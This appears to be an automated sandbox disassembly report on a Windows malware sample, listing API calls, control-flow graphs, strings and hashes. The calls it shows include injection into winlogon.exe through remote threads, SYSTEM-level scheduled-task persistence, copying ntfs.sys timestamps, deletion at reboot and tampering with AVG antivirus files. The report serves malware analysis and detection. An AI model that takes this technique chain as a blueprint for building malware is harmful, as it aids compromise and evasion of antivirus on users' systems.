                                                                                                                                                                                                                • Opcode Fuzzy Hash: be0fb7a0fec5371cefce781ec144b0ab90dff0a006d7a44f6523beb7c466cbb6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB312A716842187EF311EB90DD9AFEA7768EB89B00F104155F304AA1D0DBF1AA45CBE9

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 200 4013c0-4013d0 201 4013d6-4013f2 CreateFileA 200->201 202 4014eb-4014f0 200->202 201->202 205 4013f8-401411 GetFileSizeEx 201->205 203 4014f2-4014ff IsBadWritePtr 202->203 204 40150f 202->204 206 401511-401517 203->206 207 401501-40150c 203->207 204->206 208 4014c4-4014cd 205->208 209 401417-401434 GetProcessHeap RtlAllocateHeap 205->209 208->202 210 4014cf-4014dc GetHandleInformation 208->210 211 401445-40144a 209->211 212 401436-401442 memset 209->212 210->202 213 4014de-4014e2 210->213 211->208 214 40144c-401496 SetFilePointer LockFile ReadFile UnlockFile 211->214 212->211 213->202 215 4014e4-4014e5 FindCloseChangeNotification 213->215 216 4014c1 214->216 217 401498-4014ac GetProcessHeap HeapValidate 214->217 215->202 216->208 218 4014ba 217->218 219 4014ae-4014b4 GetProcessHeap HeapFree 217->219 218->216 219->218
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00402A87,80000000,00000003,00000000,00000003,00000080,00000000,7604DB30,?,00000000,?,?,?,00401E04,00000000,7604DB30), ref: 004013E7
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 00401403
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 00401423
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 0040142A
                                                                                                                                                                                                                • memset.MSVCRT ref: 0040143D
                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401E04), ref: 0040145A
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401E04), ref: 0040146A
                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401E04), ref: 00401479
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00401E04,00000000,?,00000000,?,?,?,00401E04), ref: 0040148C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014A1
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 004014A4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014B1
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 004014B4
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401E04,00000000,7604DB30), ref: 004014D4
                                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,00401E04,00000000,7604DB30), ref: 004014E5
                                                                                                                                                                                                                • IsBadWritePtr.KERNEL32(?,00000004,7604DB30,?,00000000,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 004014F5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHeap$Process$AllocateChangeCloseCreateFindFreeHandleInformationLockNotificationPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 213124939-0
                                                                                                                                                                                                                • Opcode ID: 2415ac370f488f6398d7920364b1ddac94579256e75289cd9fb9599e4ac2c0e4
                                                                                                                                                                                                                • Instruction ID: 1e88e17013718af7825f0840a72b71bc919ec8abe2a586386afbdd05d1fe9019
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2415ac370f488f6398d7920364b1ddac94579256e75289cd9fb9599e4ac2c0e4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C04156B1900214BBE7219FE59D89FAFBB7CEB84B11F104125FB04B72D0D774594487A8

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 282 4019b0-401a31 memset * 2 lstrcpynA CreateProcessA 283 401a33-401a43 282->283 284 401a8f-401a97 282->284 285 401a45-401a4e GetHandleInformation 283->285 286 401a5d-401a67 283->286 285->286 289 401a50-401a54 285->289 287 401a81-401a8c 286->287 288 401a69-401a72 GetHandleInformation 286->288 288->287 291 401a74-401a78 288->291 289->286 290 401a56-401a57 CloseHandle 289->290 290->286 291->287 292 401a7a-401a7b CloseHandle 291->292 292->287
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004019C8
                                                                                                                                                                                                                • memset.MSVCRT ref: 004019EE
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,?+@,00000104,?,?,?,7604DB30,00000000,00000000), ref: 00401A06
                                                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,7604DB30,00000000,00000000), ref: 00401A29
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,?+@,?,?,?,7604DB30,00000000,00000000), ref: 00401A4A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,7604DB30,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,?+@,?,?,?,7604DB30,00000000,00000000), ref: 00401A6E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,7604DB30,00000000,00000000), ref: 00401A7B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                                • String ID: ?+@$D
                                                                                                                                                                                                                • API String ID: 2248944234-1654856090
                                                                                                                                                                                                                • Opcode ID: 63e8d1617f7b3eb59dfa7381756486b10c89a04084b545fc1668d5111b84a648
                                                                                                                                                                                                                • Instruction ID: b4650b333af88615931ce45c43086d11ba0b8feb79f29fc85485a8f74bed1c81
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63e8d1617f7b3eb59dfa7381756486b10c89a04084b545fc1668d5111b84a648
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C82153B2A002096FDB10DFE4DC84AEF7BBCAB54354F00417AEA05F6251D6749A45CBA4

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 293 401ea0-401ecc CreateFileA 294 401ed2-401eee GetFileTime 293->294 295 401f65-401f6a 293->295 296 401ef0-401efd GetHandleInformation 294->296 297 401f0c-401f29 CreateFileA 294->297 296->297 298 401eff-401f03 296->298 297->295 299 401f2b-401f47 SetFileTime 297->299 298->297 300 401f05-401f06 CloseHandle 298->300 299->295 301 401f49-401f56 GetHandleInformation 299->301 300->297 301->295 302 401f58-401f5c 301->302 302->295 303 401f5e-401f5f CloseHandle 302->303 303->295
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,7604DB30,00000000,?,?,?,?,?,00402AE7,?), ref: 00401EC5
                                                                                                                                                                                                                • GetFileTime.KERNEL32(00000000,?,?,*@,?,?,?,?,?,00402AE7,?,?,?), ref: 00401EDF
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402AE7,?), ref: 00401EF5
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402AE7,?), ref: 00401F06
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402AE7,?), ref: 00401F22
                                                                                                                                                                                                                • SetFileTime.KERNELBASE(00000000,?,?,*@,?,?,?,?,?,00402AE7,?), ref: 00401F38
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402AE7,?), ref: 00401F4E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402AE7,?), ref: 00401F5F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                                • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys$*@
                                                                                                                                                                                                                • API String ID: 1046229350-2079472752
                                                                                                                                                                                                                • Opcode ID: debd997a1ae25e968ba5f195e8076c6c73cac294b2f06de3a557e421d3efc3a2
                                                                                                                                                                                                                • Instruction ID: 505fd7f37fca788128ae4fd827e8faf93d8922700b858b40f06f957d70fc4d32
                                                                                                                                                                                                                • Opcode Fuzzy Hash: debd997a1ae25e968ba5f195e8076c6c73cac294b2f06de3a557e421d3efc3a2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA21967250021876D7219B64DC49FEFBB6CAF98750F144225FF01B61E0D7B45A4586E8

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(00401F70,?,0000001C), ref: 0040154F
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00401565
                                                                                                                                                                                                                • PathFileExistsA.KERNELBASE(?), ref: 00401572
                                                                                                                                                                                                                • GetTempPathA.KERNELBASE(00000104,?,00000000), ref: 00401589
                                                                                                                                                                                                                • GetTempFileNameA.KERNELBASE(?,00000000,00000000,?), ref: 004015A1
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004015BD
                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(?,00000000), ref: 004015CC
                                                                                                                                                                                                                • DeleteFileA.KERNELBASE(?), ref: 004015D9
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004015ED
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2787354276-0
                                                                                                                                                                                                                • Opcode ID: 3973d0feee2bd4d46e794484f13dae327776c0d4aca43c2d9e078c91308a651e
                                                                                                                                                                                                                • Instruction ID: 1f2af84f05926cbb5e0b354959f29bdceae47d8b45da359f5ec46e55e0df53d3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3973d0feee2bd4d46e794484f13dae327776c0d4aca43c2d9e078c91308a651e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F21FCB1D00219AFDB10DBA0DD49FEA77BCAB48700F0045AAA709F6190EB749B448FA5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,7604DB30,?,00401E75,00000000), ref: 00401317
                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,00401E75,00000000), ref: 0040132C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00401E75,00000000), ref: 0040133B
                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,?,00000000,00401E75,00000000,?,00401E75,00000000), ref: 0040134D
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00401E75,00000000), ref: 0040135D
                                                                                                                                                                                                                • SetEndOfFile.KERNELBASE(00000000), ref: 0040136A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0040138C
                                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040139D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$ChangeCloseCreateFindHandleInformationLockNotificationPointerUnlockWrite
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2878253294-0
                                                                                                                                                                                                                • Opcode ID: 767d19d3de4797b5c71be3d902a88e0ab7c1d0a14529f93e3769efd59d7c6aec
                                                                                                                                                                                                                • Instruction ID: fc3a19f52fd50960abd89716b3b21a8dc97a86bf959a0b9d512ee5003149b17c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 767d19d3de4797b5c71be3d902a88e0ab7c1d0a14529f93e3769efd59d7c6aec
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E21BE71A00204BBF7205B65DD4DFAB7A6CEBC1B51F148126FF00B66E0D7B84E81C6A8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401AC4
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401ACF
                                                                                                                                                                                                                • Process32First.KERNEL32 ref: 00401AF5
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,004010DF), ref: 00401B10
                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 00401B1C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401B38
                                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401B4A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process32$ChangeCloseCreateFindFirstHandleInformationNextNotificationSnapshotToolhelp32memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3068433855-0
                                                                                                                                                                                                                • Opcode ID: f5034955aae474984994a817a0ed0942b8356643e55c240cad4dcfde9e81f7f8
                                                                                                                                                                                                                • Instruction ID: dd63a524005d9bd3fdf31d3318007fe9a0ed814c8c3d3d806708decfbcb8f66e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5034955aae474984994a817a0ed0942b8356643e55c240cad4dcfde9e81f7f8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9611EBB25043105BC310EF55DC48A9BBBACEBD5360F00453AFE55A3290E734E949CBEA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402448
                                                                                                                                                                                                                • MoveFileA.KERNEL32(?,?), ref: 0040250F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileFolderMovePath
                                                                                                                                                                                                                • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                                • API String ID: 1404575960-1083204512
                                                                                                                                                                                                                • Opcode ID: e53c7f5395ff5d23e1ea87fbe032685214c058210a3022917d0998b022fdd273
                                                                                                                                                                                                                • Instruction ID: 2817f7f5a2ee45723a7bffe92fbd27ee54b29152b6db55fc9663a9b726faa6ae
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e53c7f5395ff5d23e1ea87fbe032685214c058210a3022917d0998b022fdd273
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 172151B45042448FC719CF14EA98B92BBF1BB88300F1581F9DA99A73B2D6B0D944CF98
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000), ref: 0040218C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                                • Opcode ID: b7cbe1c8c54e898400676a98b1d5ddb11bfceec092903a2200cc263d8e9133b1
                                                                                                                                                                                                                • Instruction ID: d0e749ada70b16f267b0096a5882ad0ed8cb575b22d8ef64c6acb779e6c27845
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7cbe1c8c54e898400676a98b1d5ddb11bfceec092903a2200cc263d8e9133b1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6D05E76E05729CBCB20DF94A5052AEF730FB45731F0083AADE247338083351C118AD4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004033FE
                                                                                                                                                                                                                • memset.MSVCRT ref: 0040341E
                                                                                                                                                                                                                • memset.MSVCRT ref: 0040343E
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 00403446
                                                                                                                                                                                                                • GetVersionExA.KERNEL32 ref: 00403461
                                                                                                                                                                                                                  • Part of subcall function 00403310: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 00403337
                                                                                                                                                                                                                  • Part of subcall function 00403310: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403359
                                                                                                                                                                                                                  • Part of subcall function 00403310: OpenProcessToken.ADVAPI32(00000000), ref: 00403360
                                                                                                                                                                                                                  • Part of subcall function 00403310: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403381
                                                                                                                                                                                                                  • Part of subcall function 00403310: CloseHandle.KERNEL32(00000000), ref: 00403397
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004034A5
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 004034BE
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 0040351B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 00403567
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 0040356E
                                                                                                                                                                                                                • memset.MSVCRT ref: 00403586
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 004035A0
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004035C3
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004035DA
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004035EE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • p=<u, xrefs: 0040379B
                                                                                                                                                                                                                • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004033E7
                                                                                                                                                                                                                • <Actions , xrefs: 0040365A
                                                                                                                                                                                                                • task%d, xrefs: 004034AC
                                                                                                                                                                                                                • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 004033C4
                                                                                                                                                                                                                • 00-->, xrefs: 0040368F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                                • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=<u$task%d
                                                                                                                                                                                                                • API String ID: 1601901853-1711019342
                                                                                                                                                                                                                • Opcode ID: 3e75ff0d6558df4951f578cf3538052f2bff9976cb2e3b9c80236ffe9a2ee6c0
                                                                                                                                                                                                                • Instruction ID: 1b369b621c6b50f993c5cfef2b03b24b37f74764d04c33fe2e8d64a6d5fdefe9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e75ff0d6558df4951f578cf3538052f2bff9976cb2e3b9c80236ffe9a2ee6c0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8D1C3B1504301ABD720DF64CC49B5B7BE8EFC8715F048A29FA49A72D1E774EA04CB99
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401FB0: memset.MSVCRT ref: 00401FD6
                                                                                                                                                                                                                  • Part of subcall function 00401FB0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401FE7
                                                                                                                                                                                                                  • Part of subcall function 00401FB0: GetLastError.KERNEL32 ref: 00401FF0
                                                                                                                                                                                                                  • Part of subcall function 00401FB0: SwitchToThread.KERNEL32 ref: 00401FFF
                                                                                                                                                                                                                  • Part of subcall function 00401FB0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00402008
                                                                                                                                                                                                                  • Part of subcall function 00401FB0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00402028
                                                                                                                                                                                                                  • Part of subcall function 00401FB0: CloseHandle.KERNEL32(00000000), ref: 00402039
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,7604DB30,?,00000000,00402DB4,winlogon.exe), ref: 00401B9D
                                                                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,7604DB30,?,00000000,00402DB4,winlogon.exe), ref: 00401BBC
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401BDB
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401BF1
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 00401BFD
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401C18
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401C28
                                                                                                                                                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 00401C6F
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401C91
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00401CBD
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 00401CD8
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 00401CF3
                                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401D01
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,?,00406400,00052A00,?), ref: 00401D34
                                                                                                                                                                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401D44
                                                                                                                                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401D56
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000), ref: 00401D6E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00401D7F
                                                                                                                                                                                                                • RtlCreateUserThread.NTDLL ref: 00401DA0
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000), ref: 00401DBC
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00401DCD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                • API String ID: 3542510048-3024904723
                                                                                                                                                                                                                • Opcode ID: ba5e8482ce6558dcd48eb70727eb2832cdeee386e3baf9961ddfede8c17bb47e
                                                                                                                                                                                                                • Instruction ID: 1cc1a5b9d3a24803e7d074aebc255e1873ec8508329ddbed26f29eb15fe00603
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba5e8482ce6558dcd48eb70727eb2832cdeee386e3baf9961ddfede8c17bb47e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E71A2B1640215ABE710DF94DD89FAF77B8AF84701F144029FA01B72D1D7B8A941C7A8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 00403337
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403359
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403360
                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403381
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00403397
                                                                                                                                                                                                                Strings
